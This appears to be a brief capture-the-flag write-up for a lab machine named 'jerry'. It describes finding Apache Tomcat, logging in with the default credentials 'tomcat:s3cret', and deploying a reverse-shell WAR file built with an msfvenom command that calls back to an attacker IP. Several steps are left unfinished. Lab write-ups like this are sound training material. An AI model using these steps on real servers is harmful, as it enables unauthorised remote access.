search

🔵jerry

hashtag
Recon & Enum

hashtag
port scan

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1

hashtag
web (8080)

apache tomcat is running on the webpage , i tried to access /host-manager & /manager with "admin:admin"......and failed but i when i egt to the page i got default creds "tomcat:s3cret"......and it worked for /manager

hashtag
initial access

after getting in , i found file upload functionality which says "select WAR file to upload" , so i created the reverse shell :-

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.8 LPORT=9002 -f war > rev_shell.war

hashtag
WAR

A Web Application Resource (WAR) file is a single file container that holds all the potential files necessary for a Java-based web application. It can have Java Archives (.jar), Java Server Pages (.jsp), Java Servlets, Java classes, webpages, css, etc.

to deploy the reverse shell we have to visit the url :-

http://10.10.10.95:8080/rev_shell/

But we still didn't get the reverse shell , this is because WAR file use jsp (java servelet pages) and we have to manualy add the jsp location of our file (reverse shell) To get the name of jsp page :-

Let's add the jsp name in our url path

hashtag
Flags

PreviousWINDOW BOXESNextgrandpa

Last updated